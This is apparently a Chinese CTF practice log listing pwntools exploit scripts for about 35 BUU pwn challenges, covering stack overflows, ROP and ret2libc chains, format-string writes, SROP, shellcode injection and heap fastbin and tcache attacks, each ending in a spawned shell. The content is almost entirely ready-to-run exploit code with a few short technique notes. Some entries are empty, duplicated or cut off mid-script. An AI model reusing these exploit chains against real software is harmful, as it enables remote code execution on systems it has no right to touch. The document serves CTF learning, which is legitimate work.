• 记录下自己在buu的刷题之旅,持续更新。由于本人是pwn新手,所以一些关于堆的题目先放着等以后在补齐。下面直接放exp。(现在已经开始恶补堆题~)

1.test_your_nc

#!/usr/bin/python
#coding:utf-8

from pwn import *
context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'
if args.Q:
	io=remote('node3.buuoj.cn',29718)
else:
	io=process('./test')
io.interactive()

2.rip

#!/usr/bin/python
#coding:utf-8

from pwn import * 
context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'
test=0
if test:
	io=process('./pwn1')
else:
	io=remote('node3.buuoj.cn',25469)

payload ='a'*15
payload+=p64(0x401186)
io.sendline(payload)
io.interactive()

3.warmup_csaw_2016/

#!/usr/bin/python
#coding:utf-8

from pwn import * 
context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'
test=0
if test:
	io=process('warmup_csaw_2016')
else:
	io=remote('node3.buuoj.cn',27237)
io.recvuntil('WOW:')
cat_flag_addr=io.recv(8)
payload ='a'*72
payload+=p64(int(cat_flag_addr,16))
io.send(payload)
io.interactive()

4.pwn1_sctf_2016

#!/usr/bin/python
#coding:utf-8

from pwn import * 
context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'
test=0
if test:
	io=process('./pwn1')
else:
	io=remote('node3.buuoj.cn',25226)

payload ='I'*20
payload+='a'*4
payload+=p32(0x8048f13)

io.send(payload)
io.interactive()

5.ciscn_2019_n_1

#!/usr/bin/python
#coding:utf-8

from pwn import * 
context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'
if args.T:
	io=process('ciscn_2019_n_1')
else:
	io=remote('node3.buuoj.cn',28867)

payload ='a'*56
payload+=p64(0x4006be)
io.send(payload)
io.interactive()

6.ciscn_2019_c_1

#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.G:
	io=remote('node3.buuoj.cn',28951)
else:
	io=process('./ciscn_2019_c_1')
elf=ELF('./ciscn_2019_c_1')

puts_plt=elf.plt['puts']
gets_got=elf.got['gets']

log.success('puts_plt => {}'.format(hex(puts_plt)))
log.success('puts_got => {}'.format(hex(gets_got)))

rdi_ret=0x00000000400c83
start_addr=0x400790

p.sendlineafter('choice!\n', '1')
 
payload1 = 'a' * (0x50 + 8)
payload1 += p64(rdi_ret) + p64(gets_got) + p64(puts_plt)
payload1 += p64(start_addr)
 
io.sendline(payload1)
 
io.recvuntil('@')
io.recvline()
gets_leak = u64(io.recvline()[:-1].ljust(8, '\0'))
log.success('gets_leak_addr => {}'.format(hex(gets_leak)))
libc=LibcSearcher('gets',gets_leak)
libc_base=gets_leak-libc.dump('gets')
system_addr=libc_base+libc.dump('system')
binsh_addr=libc_base+libc.dump('str_bin_sh')
log.success('system_addr => {}'.format(hex(system_addr)))
log.success('binsh_addr => {}'.format(hex(binsh_addr)))

io.sendline('1')
 
payload1 = 'a' * (0x50 + 8)
payload1 += p64(0x4006b9)+p64(rdi_ret) + p64(binsh_addr) + p64(system_addr)
payload1 += p64(start_addr)
 
io.sendline(payload1)
io.interactive()

7.babyrop

#!/usr/bin/python
#coding:utf-8

from pwn import * 


io=process('./pwn')
elf=ELF('./pwn')
libc=ELF('./libc-2.23.so')
system_libc=libc.symbols['system']
binsh_libc=libc.search('/bin/sh').next()
write_libc=libc.symbols['write']
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=0x8048825
payload='\x00'+'\xff'*10
io.sendline(payload)
io.recvuntil("Correct\n")
payload='a'*(0xe7+4)+p32(write_plt)+p32(main_addr)
payload+=p32(1)+p32(write_got)+p32(4)
io.sendline(payload)
write_addr=u32(io.recv(4))
base=write_addr-write_libc
system_addr=system_libc+base
binsh_addr=binsh_libc+base
payload='\x00'+'\xff'*10
io.sendline(payload)
io.recvuntil("Correct\n")
payload='a'*(0xe7+4)+p32(system_addr)+p32(main_addr)
payload+=p32(binsh_addr)
io.sendline(payload)
io.interactive()

8.get_start_3dsctf_2016 

#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='i386',os='linux',timeout=1)
context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',27979)
else:
	io=process('./get_started_3dsctf_2016')

payload ='a'*56
payload+=p32(0x080489a0)
payload+=p32(0x0804e6a0)
payload+=p32(0x308CD64F)
payload+=p32(0x195719D1)
io.sendline(payload)
io.recvuntil('?')
flag=io.recv()
log.success('The flag is :{}'.format(flag))

9.not_the_same

#!/usr/bin/python
#coding:utf-8

from pwn import *
  
context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
        io=remote('node3.buuoj.cn',28393)
else:
        io=process('./not_the_same_3dsctf_2016')
get_secret=0x080489a0
print_addr=0x0804f0a0
bss_addr=0x080ECA2D
exit_addr=0x0804e660
payload ='a'*45
payload+=p32(get_secret)
payload+=p32(print_addr)
payload+=p32(exit_addr)
payload+=p32(bss_addr)
io.sendline(payload)
io.recvuntil('...')
flag=io.recv()
log.success('The flag is: {}'.format(flag))

10.[第五空间2019 决赛]PWN5

#!/usr/bin/python
#coding:utf-8

from pwn import * 
context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'
if args.Q:
	io=remote('node3.buuoj.cn',26151)	
else:
	io=process('./pwn')
payload =p32(0x804C044)+"%10$n"
io.sendline(payload)
io.sendlineafter('passwd','4')
io.interactive()

11.ciscn_2019_n_8

#!/usr/bin/python
#coding:utf-8

from pwn import *
context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'
if args.Q:
        io=remote('node3.buuoj.cn',25574)
else:
        io=process('./ciscn_2019_n_8')

payload ='a'*52
payload+=p32(0x11)
 
io.sendline(payload)
io.interactive()

12.babyheap_0ctf_2017

  • 碰到堆题,一般思路为先leak出main_areana地址然后计算出malloc_hook偏移伪造chunk,然后修改,用uaf,double free等方法进行fastbin attack。
  • 这题的核心是堆溢出,不存在uaf漏洞。所以我们可以通过伪造chunk的方式(好像叫做堆叠)进行leak,从而进行fastbin attack。
#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',26601)
else:
	io=process('./babyheap_0ctf_2017')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
def allocate(size):
	io.sendlineafter('Command: ','1')
	io.sendlineafter('Size: ',str(size))

def fill(index,size,content):
	io.sendlineafter('Command: ','2')
	io.sendlineafter('Index: ',index)
	io.sendlineafter('Size: ',str(size))
	io.sendlineafter('Content: ',content)
	
def free(index):
	io.sendlineafter('Command: ','3')
	io.sendlineafter('Index: ',index)

def dump(index):
	io.sendlineafter('Command: ','4')
	io.sendlineafter('Index: ',index)
	io.recvuntil('Content: \n')
	return io.recvline()[:-1]
def leak():
	allocate(0x60)#0
	allocate(0x40)#1
	allocate(0x100)#2
	payload ='a'*0x60+p64(0)+p64(0x71)
	fill('0',0x70,payload)
	payload ='a'*0x10+p64(0)+p64(0x71)
	fill('2',0x20,payload)
	free('1')
	allocate(0x60)#1-3
	payload ='a'*0x40+p64(0)+p64(0x111)
	fill('1',0x50,payload)
	allocate(0x50)
	free('2')
	libc_real=u64(dump('1')[-8:].ljust(8,'\x00'))
	libc_base=libc_real-0x3c4b78
	log.success('libc_real==>{}'.format(hex(libc_real)))
	log.success('libc_base==>{}'.format(hex(libc_base)))
	return libc_base

def pwn(libc_base):
	malloc_hook = libc.symbols['__malloc_hook'] + libc_base
	one_gadget  =0x4526a+libc_base
	free('1')
	payload ='a'*0x60+p64(0)+p64(0x71)+p64(malloc_hook-35)+p64(0)
	fill('0', 0x80, payload)
	allocate(0x60)
	allocate(0x60)
	payload ='a'*19+p64(one_gadget)
	fill('2',len(payload),payload)
	allocate(0x20)
	io.interactive()
	
if __name__ == '__main__':
	libc_base=leak()
	pwn(libc_base)
	

13.ciscn_2019_s_3

  • SROP.
#!/usr/bin/python
#coding:utf-8

from pwn import *
context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'
if args.Q:
        io=remote('node3.buuoj.cn',29831)
else:
        io=process('./ciscn_s_3')
gadgets=0x4004da
read_write_addr=0x4004f1
syscall_ret=0x400517
main_addr=0x40051D
payload = '/bin/sh\x00'.ljust(16,'a')
payload+=p64(read_write_addr)
io.sendline(payload)
io.recv(0x20)
binsh_addr=u64(io.recv(8))-0x118
log.success("binsh_addr==>{}".format(hex(binsh_addr)))
frameExecve=SigreturnFrame()
frameExecve.rax =constants.SYS_execve
frameExecve.rdi =binsh_addr
frameExecve.rsi =0
frameExecve.rdx =0
frameExecve.rip =syscall_ret

payload ='a'*16
payload+=p64(gadgets)+p64(syscall_ret)+str(frameExecve)
io.sendline(payload)
io.interactive()

14.babyfengshui_33c3_2016

  • 这题考察的是堆溢出,但是有保护,我们可以通过利用unsort bin合并的特性,来阻断这个验证从而实现堆溢出,然后就是修改free为system。
#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',27693)
else:
	io=process('./babyfengshui_33c3_2016')
elf=ELF('./babyfengshui_33c3_2016')
	
def add(size_des,name,text_len,text):
	io.sendlineafter('Action: ','0')
	io.sendlineafter('size of description: ',str(size_des))
	io.sendlineafter('name: ',name)
	io.sendlineafter('text length: ',str(text_len))
	io.sendlineafter('text: ',text)

def delete(index):
	io.sendlineafter('Action: ','1')
	io.sendlineafter('index: ',str(index))
	
def display(index):
	io.sendlineafter('Action: ','2')
	io.sendlineafter('index: ',str(index))

def update(index,text_len,text):
	io.sendlineafter('Action: ','3')
 	io.sendlineafter('index: ',str(index))
 	io.sendlineafter('text length: ',str(text_len))
 	io.sendlineafter('text: ',text)
 	
def leak():
	add(0x80,'0',0x80,'a')
	add(0x80,'1',0x80,'a')
	add(0x80,'2',0x80,'/bin/sh\x00')
	delete(0)
	add(0x100,'3',0x19C,'a'*0x198+p32(elf.got['free']))
	display(1)
	io.recvuntil('description: ')
	free_leak=u32(io.recv(4))
	log.success('free_leak==>{}'.format(hex(free_leak)))
	return free_leak
def pwn(free_leak):
	libc=LibcSearcher('free',free_leak)
	libc_base=free_leak-libc.dump('free')
	system_addr=libc_base+libc.dump('system')
	update(1,4,p32(system_addr))
	delete(2)
	io.interactive()
if __name__=='__main__':
	free_leak=leak()
	pwn(free_leak)

15.[HarekazeCTF2019]baby_rop

#!/usr/bin/python
#coding:utf-8

from pwn import *
context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'
if args.Q:
        io=remote('node3.buuoj.cn',29836)
else:
        io=process('./babyrop')
elf=ELF('./babyrop')
scanf_addr=elf.plt['__isoc99_scanf']
system_addr=elf.plt['system']
binsh_addr=0x601150
format_s=0x4006c5
p_r  =0x400683
p_p_r=0x400681
payload ='a'*0x18
payload+=p64(p_r)
payload+=p64(format_s)
payload+=p64(p_p_r)
payload+=p64(binsh_addr)
payload+=p64(0)
payload+=p64(scanf_addr)
payload+=p64(p_r)
payload+=p64(binsh_addr)
payload+=p64(system_addr)
payload+=p64(0)
#gdb.attach(io)
#pause()
io.sendline(payload)
sleep(1)
io.sendline('/bin/sh\x00')
io.interactive()

16.pwn2_sctf_2016

#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *
context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'
if args.Q:
        io=remote('node3.buuoj.cn',29744)
else:
        io=process('./pwn2_sctf_2016')
elf=ELF('pwn2_sctf_2016')

printf_plt=elf.plt['printf']
printf_got=elf.got['printf']
format_s=0x080486f8
main_addr=elf.symbols['main']

log.success('printf_plt==>{}'.format(hex(printf_plt)))
log.success('printf_got==>{}'.format(hex(printf_got)))
io.sendline('-1')
io.recv()
payload ='a'*0x30
payload+=p32(printf_plt)
payload+=p32(main_addr)
payload+=p32(format_s)
payload+=p32(printf_got)
io.sendline(payload)
io.recvuntil('You said: ')
io.recvuntil('You said: ')
printf_leak=(u32(io.recv(4).ljust(4,'\x00')))
log.success('printf_leak==>{}'.format(hex(printf_leak)))

libc=LibcSearcher('printf',printf_leak)
libc_base_addr=printf_leak-libc.dump('printf')
system_addr=libc_base_addr+libc.dump('system')
binsh_addr=libc_base_addr+libc.dump('str_bin_sh')
log.success('system_addr==>{}'.format(hex(system_addr)))
log.success('binsh_addr==>{}'.format(hex(binsh_addr)))

io.sendline('-1')
io.recv()
payload ='a'*0x30
payload+=p32(system_addr)
payload+=p32(main_addr)
payload+=p32(binsh_addr)
io.sendline(payload)
io.interactive()

17.ciscn_2019_final_3

  • 这题只要两个功能,add和remove。所以要想着如何去泄漏libc。由于没有show功能和edit功能。正常思路一般是IO_stdout泄漏和hor,但是由于程序本身就有一个gift功能,所以我们可以另辟蹊径,通过tcache double free来合并堆块,然后得到进而libc,然后在free一块堆,由于当unsortbin为一块时,再次申请堆块,若处于unsortbin的大小范围内就会从其头部切割,剩下的往下移,这样我们就可以通过该机制申请堆块把unsortbin的fd移到已经free到tcahcebin里面的堆块,然后在分配一个与其大小相同的堆块,就可以通过gift得到一个地址,在找到与libc的偏移,减去得libc_base然后就是double free随便打,free_hook还是malloc_hook随便你了。
#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'
libc = ELF('/home/dingjie/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
ptr_list=[]
if args.Q:
	io=remote('node3.buuoj.cn',28589)
else:
	io=process('./ciscn_final_3')
def add(idx,sz,ct='a'):
	io.sendlineafter('choice > ','1')
	io.sendlineafter('index\n',str(idx))
	io.sendlineafter('size\n',str(sz))
	io.sendafter('something\n',ct)
	io.recvuntil('gift :')
	gift=int(io.recv(14),16)
	log.success('user_ptr==>'+hex(gift))
	return gift
def dele(idx):
	io.sendlineafter('choice > ','2')
	io.sendlineafter('index\n',str(idx))
	
def leak():
	global ptr_list
	for i in range(0,9):#0-8
		if i==2:
			gift=add(i,0x40)
		else:
			gift=add(i,0x70)
			ptr_list.append(gift)
	add(9,0x50)#9 flag
	dele(5)
	dele(5)
	add(10,0x70,p64(ptr_list[0]-0x10))#7=5
	add(11,0x70)
	add(12,0x70,p64(0)+p64(0x451))
	dele(0)
	dele(2)
	add(13,0x70)
	add(14,0x70)
	add(15,0x40)
	leak=add(16,0x40)
	return leak
def pwn(leak):
	libc_base=leak-0x3ebca0
	malloc_hook=libc_base+libc.sym['__malloc_hook']
	one_gadget=libc_base+0x10a38c
	add(17,0x20)
	dele(17)
	dele(17)
	add(18,0x20,p64(malloc_hook))
	add(19,0x20)
	add(20,0x20,p64(one_gadget))
	##gdb.attach(io)
	#pause()
	io.sendlineafter('choice > ','1')
	io.sendlineafter('index\n','21')
	io.sendlineafter('size\n','20')
	io.interactive()
if __name__=='__main__':
	leak=leak()
	pwn(leak)

18.ez_pz_hackover_2016

#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',29026)
else:
	io=process('./ez_pz_hackover_2016')

io.recvuntil('0x')
stack_leak=int(io.recv(8),16)-28
log.success('stack__leak==>{}'.format(hex(stack_leak)))
shellcode = asm(shellcraft.sh())
#shellcode = '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
io.recvuntil('> ')
payload ='crashme\x00'
payload+='a'*18
payload+=p32(stack_leak)
payload+=shellcode
#gdb.attach(io,'b *0x80486c6')
#pause()
io.sendline(payload)
io.interactive()

19.ciscn_2019_ne_5

#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',27750)
else:
	io=process("./ne_5")
elf=ELF('./ne_5')
system_addr=elf.plt['system']
exit_addr=elf.plt['exit']
binsh_addr =0x80482ea
io.sendline('administrator')
io.sendlineafter('t\n:','1')
payload ='a'*76
payload+=p32(system_addr)
payload+=p32(exit_addr)
payload+=p32(binsh_addr)
payload+=p32(exit_addr)
#gdb.attach(io,'b 0x80486fc')
#pause()
io.sendlineafter('info:',payload)
io.sendlineafter('t\n:','4')
io.interactive()

20.ciscn_2019_n_3

  • 这题的free存在UAF漏洞。然后利用fastbin LIFO的特性,把free的指针改成system,之所以把print的指针改成sh。是因为free时指针指向这里,free的时候就相当于执行来system(sh)。(众所周知,sh也能开shell)
#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',27570)
else:
	io=process('./ciscn_2019_n_3')
elf=ELF('./ciscn_2019_n_3')

def add(index,types,length,content):
	io.sendlineafter('CNote > ','1')
	io.sendlineafter('Index > ',str(index))
	if types==1:
		io.sendlineafter('Type > ',str(types))
		io.sendlineafter('Value > ',str(content))
	else:
		io.sendlineafter('Type > ',str(types))
		io.sendlineafter('Length > ',str(length))
		io.sendlineafter('Value > ',content)
def dele(index):
	io.sendlineafter('CNote > ','2')
	io.sendlineafter('Index > ',str(index))
def show(index):
	io.sendlineafter('CNote > ','3')
	io.sendlineafter('Index > ',str(index))

if __name__=='__main__':
	add(0,2,0x38,'www')#1
	add(1,1,0,0x41)#2
	dele(0)
	dele(1)
	add(2,2,0xc,'sh\x00\x00'+p32(elf.plt['system']))
	dele(0)
	io.interactive()

21.[HarekazeCTF2019]baby_rop2

#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',25639)
else:
	io=process("./babyrop2")
elf=ELF('./babyrop2')

printf_plt=elf.plt['printf']
libc_start_got=elf.got['__libc_start_main']
main_addr=elf.symbols['main']
format_s=0x400770
pd_r=0x400733
ps_p15_r=0x400731

payload ='a'*0x28
payload+=p64(pd_r)
payload+=p64(format_s)
payload+=p64(ps_p15_r)
payload+=p64(libc_start_got)
payload+=p64(0)
payload+=p64(printf_plt)
payload+=p64(main_addr)

io.sendlineafter('? ',payload)
io.recvuntil('again, ')
io.recvuntil('again, ')
a=io.recv(6)
libc_leak =u64(a.ljust(8,'\x00'))
log.success('printf_leak==>{}'.format(hex(libc_leak)))

libc =LibcSearcher('__libc_start_main',libc_leak)
libc_base_addr=libc_leak-libc.dump('__libc_start_main')
system_addr=libc_base_addr+libc.dump('system')
binsh_addr=libc_base_addr+libc.dump('str_bin_sh')
log.success('libc_base_address ==>'.format(hex(libc_base_addr)))
log.success('system_address    ==>{}'.format(hex(system_addr)))
log.success('binsh _address    ==>{}'.format(hex(binsh_addr)))
payload ='a'*0x28
payload+=p64(pd_r)
payload+=p64(binsh_addr)
payload+=p64(system_addr)
payload+=p64(main_addr)
io.sendlineafter('? ',payload)
io.interactive()

22.ciscn_2019_n_5

#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',27657)
else:
	io=process("./ciscn_2019_n_5")
elf=ELF('./ciscn_2019_n_5')

binsh_addr=elf.bss()+0x20

shellcode=asm(shellcraft.sh())

io.sendlineafter('name\n',shellcode)

payload ='a'*0x28
payload+=p64(binsh_addr)
io.sendlineafter('me?\n',payload)
io.interactive()

23.ciscn_2019_es_2

#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='i386',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
        io=remote('node3.buuoj.cn',27325)
else:
        io=process("./ciscn_2019_es_2")
elf=ELF('./ciscn_2019_es_2')

leave_ret=0x080484b8
system_addr=elf.plt['system']
payload ='a'*0x20
payload+='b'*8

io.send(payload)
io.recvuntil('b'*8)
stack_leak=u32(io.recv(4).ljust(4,'\x00'))-0x38 #shurudianweizhi
log.success('stack_leak==>{}'.format(hex(stack_leak)))

#payload =p32(stack_leak+0x30)
payload =p32(0)
payload+=p32(system_addr)
payload+=p32(0)
payload+=p32(stack_leak+0x10)
payload+='/bin/sh\x00'
payload+='a'*0x10
payload+=p32(stack_leak)
payload+=p32(leave_ret)
io.send(payload)
io.interactive()

24.roarctf_2019_easy_pwn

  • 在write_n那边存在一个off by one漏洞,然后又由于create使用的是calloc,所以不能正常用unsurt bin进行泄漏,然后就是用unsort bin的特殊机制进行泄漏再进行一个(当unsort bin只存在一个时被视为last_remainder)当再次malloc时,小于或等于它的大小时,会切割它。然后就是改malloc_hook了,这里有两种方法。(1.利用堆重叠,修改大小然后fastbin attack。2.因为特殊机制,这里将剩下的last_remainder申请回来,这样由于前面那个被extend的没有被free,所以在次申请的与前面同指向堆,然后就是free其中一个,在修改另一个。然后再次fastbin attack)不过这里注意的是这里4个one_gadget都不能用。所以用realloc_hook配合malloc_hook进行调整。
#!/usr/bin/python
#coding:utf-8

from pwn import *
context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',28202)
else:
	io=process('./roarctf_2019_easy_pwn')
elf=ELF('./roarctf_2019_easy_pwn')

def create(size):
	io.sendlineafter('choice: ','1')
	io.sendlineafter('size: ',str(size))

def write(index,size,content):
	io.sendlineafter('choice: ','2')
	io.sendlineafter('index: ',str(index))
	io.sendlineafter('size: ',str(size))
	io.sendlineafter('content: ',content)

def drop(index):
	io.sendlineafter('choice: ','3')
	io.sendlineafter('index: ',str(index))
	
def show(index):
	io.sendlineafter('choice: ','4')
	io.sendlineafter('index: ',str(index))
def leak():
	create(0x58)#0
	create(0x60)#1
	create(0x60)#2
	create(0x60)#3
	write(0,0x58+10,'a'*0x58+'\xe1')
	drop(1)
	create(0x60)#1
	show(2)
	io.recvuntil('content: ')
	leak=u64(io.recv(6).ljust(8,'\x00'))
	log.success('leak==>{}'.format(hex(leak)))
	create(0x60)#4<==>2
	return leak
def pwn(leak):
	malloc_hook_addr=leak-0x68
	libc_base=malloc_hook_addr-0x3c4b20+0x10
	log.success('libc_base==>{}'.format(hex(libc_base)))
	one_gadget = libc_base +0xf1147
	fake_chunk=malloc_hook_addr-35
	libc_realloc=libc_base+0x846c0
	#gdb.attach(io)
	#pause()
	create(0x58)#5
	create(0x60)#6
	create(0x60)#7
	create(0x60)#8
	write(5,0x58+10,'a'*0x58+'\xe1')
	drop(6)
	drop(7)
	create(0xd0)#6
	payload='\x00'*0x60+p64(0)+p64(0x71)+p64(fake_chunk)+p64(0)
	write(6,len(payload),payload)
	create(0x68)#7
	create(0x68)#9
	payload ='\x00'*11+p64(one_gadget)+p64(libc_realloc+4)
	write(9,len(payload),payload)
	#gdb.attach(io,'b calloc')
	#pause()
	create(0x10)
	io.interactive()
if __name__ =='__main__':
	leak=leak()
	pwn(leak)
	
#!/usr/bin/python
#coding:utf-8

from pwn import *
context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',28202)
else:
	io=process('./roarctf_2019_easy_pwn')
elf=ELF('./roarctf_2019_easy_pwn')

def create(size):
	io.sendlineafter('choice: ','1')
	io.sendlineafter('size: ',str(size))

def write(index,size,content):
	io.sendlineafter('choice: ','2')
	io.sendlineafter('index: ',str(index))
	io.sendlineafter('size: ',str(size))
	io.sendlineafter('content: ',content)

def drop(index):
	io.sendlineafter('choice: ','3')
	io.sendlineafter('index: ',str(index))
	
def show(index):
	io.sendlineafter('choice: ','4')
	io.sendlineafter('index: ',str(index))
def leak():
	create(0x58)#0
	create(0x60)#1
	create(0x60)#2
	create(0x60)#3
	write(0,0x58+10,'a'*0x58+'\xe1')
	drop(1)
	create(0x60)#1
	show(2)
	io.recvuntil('content: ')

25.jarvisoj_level0

#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',27664)
else:
	io=process("./level0")

system_addr=0x400596

payload ='a'*0x88
payload+=p64(system_addr)

io.sendline(payload)
io.interactive()

26.jarvisoj_level2

#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',25765)
else:
	io=process("./level2")
elf=ELF('./level2')
system_plt=elf.plt['system']
binsh_addr=0x0804A024

payload ='a'*0x8c
payload+=p32(system_plt)
payload+=p32(0)
payload+=p32(binsh_addr)

io.sendline(payload)
io.interactive()

27.jarvisoj_level2_x64

#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',28357)
else:
	io=process("./level2_x64")
elf=ELF('./level2_x64')

system_plt=elf.plt['system']
pop_rdi=0x00000000004006b3

binsh_addr=0x600A90

payload ='a'*0x88
payload+=p64(pop_rdi)
payload+=p64(binsh_addr)
payload+=p64(system_plt)

io.sendline(payload)
io.interactive()

28.ciscn_final_2

  • 待补充。。

29.[ZJCTF 2019]Login

#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'
if args.Q:
	io=remote('node3.buuoj.cn',28770)
else:
	io=process('./login')
system=0x400e88

io.sendlineafter('name: ','admin')
io.sendlineafter('password: ','2jctf_pa5sw0rd'+'\x00'*58+p64(system))
io.interactive()

30.jarvisoj_tell_me_something

#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(arch='amd64',os='linux',timeout=1)
context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',27575)
else:
	io=process('./guestbook')


payload ='a'*0x88
payload+=p64(0x400620)

io.sendlineafter(':\n',payload)
log.success('The flag is {}'.format(io.recv()))

31.jarvisoj_level3_x64 

#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',25950)
else: 
	io=process('./level3_x64')

elf=ELF('./level3_x64')

write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.symbols['main']
rdi_ret=0x4006b3
rsi_r15_ret=0x4006b1
def leak():
	payload ='a'*0x88
	payload+=p64(rdi_ret)
	payload+=p64(1)
	payload+=p64(rsi_r15_ret)
	payload+=p64(write_got)
	payload+=p64(0)
	payload+=p64(write_plt)
	payload+=p64(main_addr)
	io.sendafter('Input:\n',payload)
	write_leak=u64(io.recv(6).ljust(8,'\x00'))
	log.success('write_leak==>{}'.format(hex(write_leak)))
	return write_leak
def pwn(write_leak):
	libc=LibcSearcher('write',write_leak)
	libc_base=write_leak-libc.dump('write')
	system_addr=libc.dump('system')+libc_base
	binsh_addr=libc.dump('str_bin_sh')+libc_base
	payload ='a'*0x88
	payload+=p64(rdi_ret)
	payload+=p64(binsh_addr)
	payload+=p64(system_addr)
	io.sendafter('Input:\n',payload)
	io.interactive()
	
if __name__ =='__main__':
	write_leak=leak()
	pwn(write_leak)

32.jarvisoj_level3

#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',27990)
else: 
	io=process('./level3')

elf=ELF('./level3')

write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.symbols['main']
p_r=0x080482f1
p3_r=0x08048509
def leak():
	payload ='a'*0x8c
	payload+=p32(write_plt)
	payload+=p32(main_addr)
	payload+=p32(1)
	payload+=p32(write_got)
	payload+=p32(8)
	io.sendafter('Input:\n',payload)
	write_leak=u64(io.recv(6).ljust(8,'\x00'))
	log.success('write_leak==>{}'.format(hex(write_leak)))
	return write_leak
def pwn(write_leak):
	libc=LibcSearcher('write',write_leak)
	libc_base=write_leak-libc.dump('write')
	system_addr=libc.dump('system')+libc_base
	binsh_addr=libc.dump('str_bin_sh')+libc_base
	payload ='a'*0x8c
	payload+=p32(system_addr)
	payload+='dead'
	payload+=p32(binsh_addr)
	io.sendafter('Input:\n',payload)
	io.interactive()
	
if __name__ =='__main__':
	write_leak=leak()
	pwn(write_leak)

33.roarctf_2019_realloc_magic

34.jarvisoj_level4

#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *

context.update(arch='amd64',os='linux',timeout=1)
#context.log_level='debug'

if args.Q:
	io=remote('node3.buuoj.cn',29684)
else: 
	io=process('./level4')

elf=ELF('./level4')

write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=elf.symbols['main']
p_r=0x080482f1
p3_r=0x08048509
def leak():
	payload ='a'*0x8c
	payload+=p32(write_plt)
	payload+=p32(main_addr)
	payload+=p32(1)
	payload+=p32(write_got)
	payload+=p32(4)
	io.sendline(payload)
	write_leak=u32(io.recv(4).ljust(4,'\x00'))
	log.success('write_leak==>{}'.format(hex(write_leak)))
	return write_leak
def pwn(write_leak):
	libc=LibcSearcher('write',write_leak)
	libc_base=write_leak-libc.dump('write')
	system_addr=libc.dump('system')+libc_base
	binsh_addr=libc.dump('str_bin_sh')+libc_base
	payload ='a'*0x8c
	payload+=p32(system_addr)
	payload+='dead'
	payload+=p32(binsh_addr)
	io.sendlineafter('Input:\n',payload)
	io.interactive()
	
if __name__ =='__main__':
	write_leak=leak()
	pwn(write_leak)

35.[Black Watch 入群题]PWN

#!/usr/bin/python
#coding:utf-8

from pwn import *
from LibcSearcher import *

if args.Q:
	io=remote('node3.buuoj.cn',25115)
else:
	io=process('./spwn')
elf=ELF('./spwn')

s_addr=0x0804a300
leave_ret=0x08048408
write_plt=elf.plt['write']
write_got=elf.got['write']
fake_bss=0x0804a300
